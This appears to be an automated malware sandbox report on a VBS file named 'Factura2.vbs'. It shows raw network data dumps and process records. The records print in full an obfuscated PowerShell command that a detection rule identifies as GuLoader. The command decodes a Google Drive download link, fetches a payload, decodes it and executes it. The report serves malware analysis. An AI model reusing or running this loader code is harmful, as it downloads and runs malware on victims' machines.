                                                                      Data Ascii: A\0*UUfJl.p0bbg`GuKkQ*?n0*?,08)&63]gAkrVB:044M,&wAr/MTt:w%Z:6N%V&l-BOTr|{1_hcZ\*1vD+Q50I/^z[C')}s=d'i
                                                                      2024-04-18 08:11:45 UTC443INData Raw: 98 9b 3d 37 36 24 f8 16 9f 1b 24 32 3a ac 14 2b cb d9 03 e6 05 1b 06 e4 f8 14 36 33 53 d9 a1 5d b7 2a 40 52 60 87 c5 56 3c 13 26 0d d2 b1 23 70 3e 34 14 e3 54 17 18 e7 dc 28 f6 77 2c ef 94 9c 61 f6 09 72 2f b3 54 9e 3a 5a 74 90 ca 50 f2 74 23 da ea 2a fc a1 92 c1 40 08 25 a8 fe cc 2a 84 c9 1e 9e bc ef 60 6d 91 c4 f6 93 14 fa d4 c2 a6 fe 6d f1 7f fe 89 be c5 8b 4f c0 95 5a 40 8b 3b 7d cf f4 dd a0 7f 6d 63 68 5b 79 58 10 cd 9a 58 8c 27 e4 11 13 88 14 44 7b 2a 96 10 fb 30 93 07 44 29 f6 04 93 67 d5 e1 6d 76 32 5e 63 27 a9 11 f9 e1 8f 8a 39 f7 d6 3b e8 80 8a a6 9d 66 2d 49 5e 3e 51 6b 3a 33 07 7e 16 da 0b 89 49 61 3c 1b a4 01 20 3d 45 cc 70 fc 65 da e5 84 2c 46 8c 04 78 e9 12 8e bb 00 37 9a 89 a7 f1 a6 68 0f f2 1a ea 60 c3 ef 1c 54 b5 c2 55 dd 1b f8 b7 37 14
                                                                      Data Ascii: =76$$2:+63S]*@R`V<&#p>4T(w,ar/T:ZtPt#*@%*`mmOZ@;}mch[yXX'D{*0D)gmv2^c'9;f-I^>Qk:3~Ia< =Epe,Fx7h`TU7
                                                                      2024-04-18 08:11:45 UTC1255INData Raw: 2a 97 b5 0e e2 e0 32 ce 5a 0f 6d 3a 4f 9b 56 5d 55 84 a7 ab f5 5e cc ac 69 87 28 2f 78 ad 70 4c 57 28 b3 15 49 18 db ff 24 5f 70 d9 31 2e 17 27 be 6a 0c ba 9a 08 a1 17 fa 49 04 cd c1 84 aa 09 2a 81 96 b3 89 56 66 66 12 e8 6b f0 46 2b 4c b0 e7 e8 1d a3 36 c0 37 86 98 3d 1e 91 3e 39 3d 85 28 8e 34 df e0 8c 03 dc 28 13 f2 93 02 d6 a7 86 a3 4a 7e c0 a0 46 bc f4 f1 b0 c4 22 af 4d 21 f4 12 d1 53 ae f3 07 41 ec 5b dd 7a 34 cf e6 c2 c5 b5 4c 39 ab f1 86 ca 12 86 bb 10 df 69 b2 39 bd 24 6d e2 6b 27 c6 50 40 e9 48 b3 85 14 85 77 6e ad b0 df c9 e5 f5 64 09 18 97 a8 50 c3 a9 31 ba d8 d8 92 04 18 13 43 7a 9e 8e 37 33 92 4a 10 f6 86 91 75 fd 52 6d 17 93 da bd af ea be 16 ff 74 94 9d 8c 7a cc e2 ea 8b a0 5a a8 f3 db 02 e0 a0 04 22 88 6e 87 0c 6f fa 2d a6 5b 32 05 24 82
                                                                      Data Ascii: *2Zm:OV]U^i(/xpLW(I$_p1.'jI*VffkF+L67=>9=(4(J~F"M!SA[z4L9i9$mk'P@HwndP1Cz73JuRmtzZ"no-[2$
                                                                      2024-04-18 08:11:45 UTC1255INData Raw: 63 f4 a5 8b 5e 1c 33 94 a3 80 d5 e8 35 0f f6 33 44 85 2f 51 35 fe 30 fc a0 49 2f fc 81 db 63 d5 8a c9 7a 35 54 9e 21 a9 11 f9 39 5f 8c 39 8c 95 45 ca 84 a2 9f b5 9d 26 69 45 14 51 6b c4 7c 6f 7e 16 24 07 85 49 94 23 1b a4 87 de 3c 7c 81 71 fc 65 22 e9 80 2c 6f b2 04 79 e3 ec 80 b3 7f 16 ba 89 a8 f1 58 66 8d f3 1a 14 6a cf ef 3c 5f b5 c2 54 23 1a c1 b9 f1 14 3c ce 27 e0 8e fa 4a c2 49 ad aa 90 cc 5a 36 61 96 43 4d 82 a3 9c 78 b5 45 86 de bd 00 dd d4 87 68 e3 d0 6c f8 be 05 3f b9 3c 70 69 33 8d 7c 42 25 ee cc eb 80 52 bf 7f 0b 23 7c 9c 01 11 3f 46 10 b1 37 cb 46 3a 59 16 99 3c 54 8f f3 ab f2 df be e3 ce dd f6 25 0e be a4 ce 1a a6 50 86 8f bb cc d5 ee d2 a9 9a 2b 13 9e 0f 4b d1 8f eb 7a 2b 63 c0 aa 67 34 a4 24 e0 e4 95 92 00 9a 57 31 67 d9 0e d6 3b 18 10 c8
                                                                      Data Ascii: c^353D/Q50I/cz5T!9_9E&iEQk|o~$I#<|qe",oyXfj<_T#<'JIZ6aCMxEhl?<pi3|B%R#|?F7F:Y<T%P+Kz+cg4$W1g;
                                                                      2024-04-18 08:11:45 UTC1255INData Raw: a0 d1 ff ac 1f 36 99 50 43 fd 51 c4 20 02 7c 02 19 82 d6 c9 15 a5 98 c0 4d dc ef 7f e1 38 4f 53 73 b1 ec c1 81 2a 52 08 67 2b 3e 1a b2 55 a9 a1 d5 22 ad fe 7b da 9a 83 71 37 bd 0a 0f 4a ca 06 79 c2 dc 96 30 d1 26 a6 f9 16 7d 20 f1 b1 fd 84 de f6 96 71 9c 1f 2f c5 e2 72 2d 5d d3 b5 09 c2 3c 7b 63 52 ac a6 a2 10 9f 0b ad 7a 82 10 69 be 30 a1 f2 65 40 b2 fc d4 21 3a 5e fd bb 78 86 53 ca a2 17 4c 97 6c 0e 7c d1 10 d2 57 63 5b d9 9a 7d 67 b3 c9 44 6e 0d ee 19 8b 9f e8 6b 32 a4 de 8a 95 43 50 e7 85 d4 33 b4 6e f0 e0 30 98 9b e3 1b 32 24 f8 16 9d 13 24 12 c6 a0 18 2b 15 c0 3a e3 05 e5 07 e5 dd 14 36 33 95 9a 5a a2 98 dc 4c 53 61 85 f2 46 3c 19 0e 3a cd b1 7c fa 30 32 15 c3 4d 16 0b d7 21 26 ce 75 2c 11 94 90 61 c7 26 72 2f b3 aa 61 0d 50 74 a8 34 69 02 77 23 24
                                                                      Data Ascii: 6PCQ |M8OSs*Rg+>U"{q7Jy0&} q/r-]<{cRzi0e@!:^xSLl|Wc[}gDnk2CP3n02$$+:63ZLSaF<:|02M!&u,a&r/aPt4iw#$
                                                                      2024-04-18 08:11:45 UTC1255INData Raw: f1 ed ca 6f f9 7e 05 84 f0 2e a6 d2 34 bf 16 02 1f e0 72 70 58 dd b1 2b 71 81 81 c8 69 84 81 57 da 03 2d 6b b4 3a e6 2e 95 e0 95 e9 b3 b2 dc d9 20 d7 fc 68 0a f6 f5 fb 19 6b e4 62 44 16 cf 29 47 a4 c6 b4 53 79 7e 11 41 ae 8d 2b 3e 17 cb b7 ba 18 0f af 8e d6 b5 f0 dc e0 c6 a9 f6 a6 52 07 61 18 28 ee 97 8f e5 36 f4 ad 0f 20 41 8a fd 43 09 1d 9c c4 c9 8d 08 86 47 d3 25 a6 b2 28 db 9f b6 5b 84 52 11 24 ba 23 c3 ea 46 1c 3a 39 e5 3e dc 2d fa d8 9f d6 71 f6 4c 8a e8 61 e0 e3 da 0e 16 87 8d 52 cb eb 00 4d 6f b9 8a 1a 55 6c ed 55 f8 c5 63 73 fe e4 9b d8 ec 7f 90 83 3c ce 14 71 26 b3 5c 33 4d d2 af 0a 72 33 d0 ac 32 bb ce 1f 51 75 a9 4e e2 24 e3 d9 0b aa 40 b3 1d 22 01 99 12 7f 3d 7a ce 2a ef 37 10 d2 0f 35 8b 8f dc 40 c3 4d 0a e3 37 c3 25 f6 df af 0e 2c 9a 68 50
                                                                      Data Ascii: o~.4rpX+qiW-k:. hkbD)GSy~A+>Ra(6 ACG%([R$#F:9>-qLaRMoUlUcs<q&\3Mr32QuN$@"=z*75@M7%,hP
                                                                      2024-04-18 08:11:45 UTC1255INData Raw: ab 2b a0 19 37 fb da 07 a7 b6 23 08 60 03 ff 38 38 e2 00 13 89 43 89 ee 09 f1 66 cd 87 96 83 58 3d 6a d7 98 a9 4e fe 40 5d db 45 7a b2 3f 26 d9 6b 3f 50 8a c2 e8 b9 13 08 34 8e f8 71 44 e2 3d 0b 5e ad 8a fb 24 b2 d9 57 22 cf 9d 85 8f f0 cf e4 56 a0 3d 73 d8 40 e1 a5 36 ba 4f 02 3e 2c f4 4c 02 91 a5 df 9c 85 37 ea f1 ab c8 2a 0a 30 3f 8e 09 57 0d 6c 78 63 3c 61 ae 2d ce 6b c7 b3 73 4e 49 7c c0 50 a3 43 7c 21 fa f5 06 4f 24 f6 c3 c5 a0 80 cf 50 96 2e 21 5b 02 05 e0 cc df 7c 23 08 ad d4 1e c4 01 ec 15 d5 c2 f9 d3 57 fd 24 83 74 d7 57 ba ce b7 b5 3b 55 c8 ab 1a 5f 6e 5e 39 d3 41 53 86 7c 6b 7d 45 ce 21 a8 df 45 2c 51 e5 55 50 bf 18 bd f0 58 79 d4 01 be 99 fc 6b 31 27 80 55 a8 05 36 0e 7d 33 a4 7d 37 14 1a b8 14 5c 19 73 9d 17 b3 8a 44 aa 94 ca ff f2 a4 4f 4f
                                                                      Data Ascii: +7#`88CfX=jN@]Ez?&k?P4qD=^$W"V=s@6O>,L7*0?Wlxc<a-ksNI|PC|!O$P.![|#W$tW;U_n^9AS|k}E!E,QUPXyk1'U6}3}7\sDOO
                                                                      2024-04-18 08:11:45 UTC1255INData Raw: 52 65 79 24 03 78 8d 77 4c a9 29 74 1e 70 16 db ff 04 66 65 db 31 d0 39 2f be 6a f2 48 94 04 81 14 04 45 08 33 e0 b6 af 09 2a 7f af 8f 92 56 66 5e 83 1b 90 0f 44 63 7c b2 ed 1f 5a a3 36 c0 c9 88 89 1d 3e 9d 3e 39 c3 75 26 82 0c ee 1e 80 0f dc f6 01 f2 93 22 28 a6 bf ad b4 7f f9 92 48 be f4 f1 b0 da 22 af 4d 21 f4 1e d1 53 ae f3 0b 41 ec 4b dd 7a 34 cf e6 c2 ce b5 4c 39 ab 1b 87 ca 12 9e 63 ef 20 96 b2 3e b1 24 16 7a 67 2b c2 0e 28 e9 48 b9 53 60 bc 79 64 94 bf e7 19 e4 0b 6d 29 02 ec ce 50 3d a3 15 84 d8 26 98 2e c5 39 59 7a 9e 70 c0 32 ab 47 66 f6 86 65 a5 d3 52 bc 0d 93 da bd 87 98 be 3a 85 5c a9 9d 8c 70 69 eb da 88 a2 08 a6 f5 db 22 fb a0 04 20 05 73 8b 0c 65 79 54 aa 5b 16 12 56 b9 24 c5 9e d0 90 8a 43 df 33 b3 5f 5e f8 49 6f 5c 9b 64 a7 5b c3 6b bd
                                                                      Data Ascii: Rey$xwL)tpfe19/jHE3*Vf^Dc|Z6>>9u&"(H"M!SAKz4L9c >$zg+(HS`ydm)P=&.9Yzp2GfeR:\pi" seyT[V$C3_^Io\d[k
                                                                      2024-04-18 08:11:45 UTC1255INData Raw: 6d f7 4b 2f f6 81 db 65 d5 c5 91 7a 35 5e bd 26 90 30 f9 1f 82 72 30 8c 95 40 9f 84 a2 9f 63 6f 27 69 3f 46 51 6b c0 15 1e 7e 16 22 21 a5 4a 41 23 1b 5a 0f dc 3c 7c 24 7c fe 65 04 e8 80 2c 6e 4c 05 41 f4 ec 80 b3 fe 1e ba 89 8f fe 58 66 05 8f 6d 14 6c cb cf 3e 5e b5 c2 ab 2d 18 c1 b9 c9 18 3e ce 1c e1 8e fa ab 3d 48 94 a6 90 cc 5a 37 41 97 42 4d 82 5d 92 9d b4 45 78 43 bf 00 fd ab 85 68 e3 28 6d c1 bb 04 3f b9 05 66 59 31 8d 16 fb db 11 32 ff aa 43 8c 4f 0f 23 52 60 0f 11 2b 7e 21 a0 17 cb 46 c4 55 e8 97 1e 54 b7 e9 a9 0c de 87 17 c2 df f6 05 2a bf a4 ce e4 59 67 a4 8f bb 32 27 e7 d2 89 be 50 67 9e f1 4e 9a 39 eb 7a 5b 73 d9 aa 67 3e e1 9a 1f 1b 6e 9a 22 9a 57 37 f7 29 05 d6 3b 8c e2 c8 ac 1d 95 00 9b 2c 2b f1 ed 77 2e 4d ea de c9 64 2f 6a 95 b3 b9 bc 94
                                                                      Data Ascii: mK/ez5^&0r0@co'i?FQk~"!JA#Z<|$|e,nLAXfml>^->=HZ7ABM]ExCh(m?fY12CO#R`+~!FUT*Yg2'PgN9z[sg>n"W7);,+w.Md/j


                                                                      Statistics

                                                                      CPU Usage

                                                                      Click to jump to process

                                                                      Memory Usage

                                                                      Click to jump to process

                                                                      High Level Behavior Distribution

                                                                      Click to dive into process behavior distribution

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      General

                                                                      Target ID:0
                                                                      Start time:10:10:53
                                                                      Start date:18/04/2024
                                                                      Path:C:\Windows\System32\wscript.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Factura2.vbs"
                                                                      Imagebase:0x7ff7899b0000
                                                                      File size:170'496 bytes
                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:2
                                                                      Start time:10:10:54
                                                                      Start date:18/04/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. B.rgHAnchye DuraarangsdPrivaelogfirGa,lesTaga,[.etox$SlentNEct suGenfraAph onRelincKroniemorthrPrecieLandstBjrne]Neohi=Can e$MelloHFolkeoMeddevSaleaeSjalsdA.allvS awnrOutbukVexateAseptr.toma ');$Smoky=Pisseskn ' SubsBAud oaU,tegaLnt,ld otharBegynuKlanttB.azaeQuintnBinde. Ha dD,ejevoLumbaw,eksin Fe ilplejeo.orniaDecimdtragiFfortriHeadllThermeMeta (Under$Opsl,uCordanHummis,racuhpseu,aUdslidIongiy,ogtr,Chair$,aadvSGrievt Sn.ea,ensirPhytot ,undh AtomuR,evelPyra.l MoraeMorphrSuffr)Humif ';$Smoky=$Asseverating[1]+$Smoky;$Starthuller=$Asseverating[0];Saprophagan (Pisseskn ' Indi$ Nonmg aflalNoninoFlashb nfaaE.dotlTro,d:Inte.s Datap IndorLogicoVandbg infifStudioHarqurKendisA amok,olysePavelrDaasenskepte,nnivs odse= apni(NumerTDebone FinnsOt ertConci-H,emgPGinetaStedstAffalh .run ritar$UnmanSreva.tBrohoaOverfr,hospt Pe.ahPatroutilgalUdl,sl PeneeHairerTrste) Netv ');while (!$sprogforskernes) {Saprophagan (Pisseskn ',ivaa$RegurgFolk,l sonioSprigbElastaBrotolvalla:StaphSBr,ehu.eulob,ireetmotoro anct Br.vaKurmalRe.frlIngvai bag n CogigUnd r=Skram$TeksttR,alirPlatouSil ne Hnde ') ;Saprophagan $Smoky;Saprophagan (Pisseskn 'HubbaSResultTr quaMorskrAppaytAbrup-Pra,sS.jeldlFeasieElleveKoghepRund, Ungdo4P.irr ');Saprophagan (Pisseskn 'Super$Suggeg Ungel Pr fo psitbVandraInterlPol,f:Randss KajupflerbrSaldeoMycelgslingfRaakooG,ardr I,ess Tullkv ktoePat,orS ertnCytoleHypoasMilko= Forb(CraneTKe soeToluqsFrstetYet p-dek aPbortsaModsttDyvouhUnbu. Whats$ Hu kS ArchtGyar aZiontrActintsemmih urblu.omprl Bry.lTuyereHavburAlwin)Byste ') ;Saprophagan (Pisseskn 'Unobe$DinargRaglalTriceoJunc,b Rutiajustil Gnat: SyndZ ov roBushbcPropiaBon ml PartoBagfl=Nonp $Id.algBly alWeedeoDimitb Pre,aSporrlcos.a:DecimKJsandoBorgerChemot For l AfrigPisannLifoiiP skenMus.tg DiskePanterPo,yd+Con.u+Legi.%Behng$ CacoF hamad Sworr Fal,eSvumnn Bh.leGratuhBoligjV.inyewic,omBrand.,etincAsymmo .estu Pa lnExtentpropa ') ;$unshady=$Fdrenehjem[$Zocalo];}Saprophagan (Pisseskn 'Bolig$KjesegProevlGa,blo B.rdbPauseaStudilKenni:BramsLRegule adedn Clare.edrat Kugl Nymaa=Su.pr In,oGSpecteMela,t Ammi-AnskaCacumeoKrigsnJingstPref,ePyobanKonfetExha, Tids$ GaviSBl wttAkadea BranrKolpotBillehsk teu Per,l UntulAl,oceWa err dgif ');Saprophagan (Pisseskn 'Syr.b$sideogPondwlAposeoP,rspbUnex aSiro,lBacil:EbraiURea.tn Coa,iHelseogebyrn CirciP.seksBlasetReereeOrdner RejssAt ac Slags=Repat Borge[hoptoS Wroky rgumsParentGavekeMo.abmFlje..Pr.acC PerioremsenSurf.v BereeUgr,irBlaartPreop]Imbo : Sidd:UnemoFF,scir bil oParacmUns.oBBa,veaSchepsPalmaeAccul6Nejsi4HabilS ,teatPa ser.ntibiAn.lenScantgTutti(Lejeo$afskiLPseudeUnstanForsve roostEngsn)Elekt ');Saprophagan (Pisseskn 'Und.k$re.segtyreslH ratome iabKondeaU brilBumme:Jvn.rSGavebc S.tao amicffiordf Sings judg Ikra=Fan,a Ko po[OutrhS Nondy Posts OccitvinedeReloamHul.i.Fl,niTAquate,arnexAfprvtCafe..Gge.uESkibinA,armcD moroInropdDecori DrninSlinggHniss] Unus: marg:SoignAKrligSF.rsiCs.nspIProduIo.ymp.BrislGB,rgoeEl.stt intrSGar,etCypr.rInactiGen,anStdergForma(Immun$Oed,pUSkinbn,ptagiCohaboDemianTalleichorisAn ist SliceSkomar Pa,tsRe.im) Xant ');Saprophagan (Pisseskn 'Alter$Bacchg Hdrel SpecoAntirb CowpaGimmilLeuco:talleSfejlmuBrandp.ooeyePro orT leviKei.un bebocp ykiuSubcomFortibStikoeUly,knJapactIndre1 Muni6Bryg,3Lejek=Retss$,hiroSu.wagcRefleo EndofO,ercfLootisTeate.IndlusPa tauKredibVaca sFr igtfrkherTweeziAuditn RiflgRetal( He m3 Sy,t1Spik.5 Poly0flout7Cho.d3Nephr,Lidel2uncom7 Ko.p4Proje3Lycop0se.eh)spout ');Saprophagan $Superincumbent163;"
                                                                      Imagebase:0x7ff6e3d50000
                                                                      File size:452'608 bytes
                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2895451341.00000243B8200000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:3
                                                                      Start time:10:10:54
                                                                      Start date:18/04/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff66e660000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:4
                                                                      Start time:10:10:56
                                                                      Start date:18/04/2024
                                                                      Path:C:\Windows\System32\cmd.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Merogastrula.Bes && echo $"
                                                                      Imagebase:0x7ff6cb040000
                                                                      File size:289'792 bytes
                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:5
                                                                      Start time:10:11:03
                                                                      Start date:18/04/2024
                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. B.rgHAnchye DuraarangsdPrivaelogfirGa,lesTaga,[.etox$SlentNEct suGenfraAph onRelincKroniemorthrPrecieLandstBjrne]Neohi=Can e$MelloHFolkeoMeddevSaleaeSjalsdA.allvS awnrOutbukVexateAseptr.toma ');$Smoky=Pisseskn ' SubsBAud oaU,tegaLnt,ld otharBegynuKlanttB.azaeQuintnBinde. Ha dD,ejevoLumbaw,eksin Fe ilplejeo.orniaDecimdtragiFfortriHeadllThermeMeta (Under$Opsl,uCordanHummis,racuhpseu,aUdslidIongiy,ogtr,Chair$,aadvSGrievt Sn.ea,ensirPhytot ,undh AtomuR,evelPyra.l MoraeMorphrSuffr)Humif ';$Smoky=$Asseverating[1]+$Smoky;$Starthuller=$Asseverating[0];Saprophagan (Pisseskn ' Indi$ Nonmg aflalNoninoFlashb nfaaE.dotlTro,d:Inte.s Datap IndorLogicoVandbg infifStudioHarqurKendisA amok,olysePavelrDaasenskepte,nnivs odse= apni(NumerTDebone FinnsOt ertConci-H,emgPGinetaStedstAffalh .run ritar$UnmanSreva.tBrohoaOverfr,hospt Pe.ahPatroutilgalUdl,sl PeneeHairerTrste) Netv ');while (!$sprogforskernes) {Saprophagan (Pisseskn ',ivaa$RegurgFolk,l sonioSprigbElastaBrotolvalla:StaphSBr,ehu.eulob,ireetmotoro anct Br.vaKurmalRe.frlIngvai bag n CogigUnd r=Skram$TeksttR,alirPlatouSil ne Hnde ') ;Saprophagan $Smoky;Saprophagan (Pisseskn 'HubbaSResultTr quaMorskrAppaytAbrup-Pra,sS.jeldlFeasieElleveKoghepRund, Ungdo4P.irr ');Saprophagan (Pisseskn 'Super$Suggeg Ungel Pr fo psitbVandraInterlPol,f:Randss KajupflerbrSaldeoMycelgslingfRaakooG,ardr I,ess Tullkv ktoePat,orS ertnCytoleHypoasMilko= Forb(CraneTKe soeToluqsFrstetYet p-dek aPbortsaModsttDyvouhUnbu. Whats$ Hu kS ArchtGyar aZiontrActintsemmih urblu.omprl Bry.lTuyereHavburAlwin)Byste ') ;Saprophagan (Pisseskn 